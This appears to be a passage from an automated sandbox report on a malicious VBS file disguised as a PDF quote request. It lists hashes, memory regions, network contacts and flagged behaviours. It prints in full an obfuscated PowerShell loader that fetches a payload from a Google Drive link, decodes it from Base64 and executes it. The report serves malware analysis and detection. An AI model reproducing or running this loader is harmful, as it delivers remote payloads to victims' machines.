SHA512 6ba88b1f1168df5674e0226555ca5c9d645412602d18450d747778156016e6fb7043a09fb38e12cb2d820d662ca9cf1a50c3409f39b16d57eb775ccc7dc1825c

C:\Users\Admin\AppData\Local\Temp\TarF46E.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/3056-335-0x0000000000920000-0x000000000185D000-memory.dmp

memory/3056-340-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-339-0x0000000000920000-0x000000000185D000-memory.dmp

memory/2752-342-0x0000000006810000-0x000000000774D000-memory.dmp

memory/3056-341-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-343-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-344-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-345-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2308-347-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

memory/3056-346-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-349-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-348-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-350-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-351-0x0000000000400000-0x0000000000581000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/3056-374-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-375-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-376-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-377-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-378-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-379-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-380-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-382-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-381-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-383-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-384-0x0000000000400000-0x0000000000581000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-25 16:26

Reported

2024-03-25 16:28

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

144s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3140 -ip 3140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 2520

Network

Country Destination Domain Proto
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
US 20.231.121.79:80 tcp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt

MD5 4c4cc23f3a17e931d1972c751c095e49
SHA1 5e1298fed9d1e92444447d4257ef0e5fcd66031d
SHA256 b068b30fb603c1a1bb4efbae00c421a6b5014f15b5757dfaff0348d8236be129
SHA512 8a77950e5c116e1f925eac15458990a8aebc5abd3330d9d3e81d5e0a4faf1811dde4e21d8c4cddff0aa086f595d1a867d4965392089a56699354f2535c635181

C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt

MD5 cf56f5795de669e0ee0796627c7142f2
SHA1 89a71383fe582e3ec82a024fd424cef08943daf9
SHA256 858e8b3e4c8bd64f2d11683cc1becf863238c7804c6712cfab844589591510bf
SHA512 c331627fe54d5849ae37d29ce028d2a600d2a6a33351384abff6a594fc2ba109e3d09b45a5a15c1e656e33811fbf0ffb0c02983f9f45f50e2f149b0749707a30

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wuuj24qa.3nd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3148-254-0x000001F73C7C0000-0x000001F73C7E2000-memory.dmp

memory/3148-258-0x00007FFD697F0000-0x00007FFD6A2B1000-memory.dmp

memory/3148-259-0x000001F754E20000-0x000001F754E30000-memory.dmp

memory/3148-260-0x000001F754E20000-0x000001F754E30000-memory.dmp

memory/3148-261-0x000001F754DC0000-0x000001F754DE6000-memory.dmp

memory/3148-262-0x000001F757320000-0x000001F757334000-memory.dmp

memory/3148-263-0x000001F754E20000-0x000001F754E30000-memory.dmp

memory/3148-264-0x000001F754E20000-0x000001F754E30000-memory.dmp

memory/3140-265-0x0000000004F40000-0x0000000004F76000-memory.dmp

memory/3140-266-0x0000000075060000-0x0000000075810000-memory.dmp

memory/3140-267-0x0000000002B80000-0x0000000002B90000-memory.dmp

memory/3140-268-0x0000000002B80000-0x0000000002B90000-memory.dmp

memory/3140-269-0x00000000055B0000-0x0000000005BD8000-memory.dmp

memory/3140-270-0x0000000005520000-0x0000000005542000-memory.dmp

memory/3140-272-0x0000000005DC0000-0x0000000005E26000-memory.dmp

memory/3140-271-0x0000000005D50000-0x0000000005DB6000-memory.dmp

memory/3140-282-0x0000000005EF0000-0x0000000006244000-memory.dmp

memory/3140-283-0x00000000064F0000-0x000000000650E000-memory.dmp

memory/3140-284-0x0000000006530000-0x000000000657C000-memory.dmp

memory/3140-285-0x0000000007D40000-0x00000000083BA000-memory.dmp

memory/3140-286-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

memory/3140-287-0x0000000007770000-0x0000000007806000-memory.dmp

memory/3140-288-0x0000000007720000-0x0000000007742000-memory.dmp

memory/3140-289-0x0000000008970000-0x0000000008F14000-memory.dmp

memory/3140-290-0x0000000007990000-0x00000000079B2000-memory.dmp

memory/3140-291-0x00000000079F0000-0x0000000007A04000-memory.dmp

memory/3140-292-0x0000000075060000-0x0000000075810000-memory.dmp

memory/3148-295-0x00007FFD697F0000-0x00007FFD6A2B1000-memory.dmp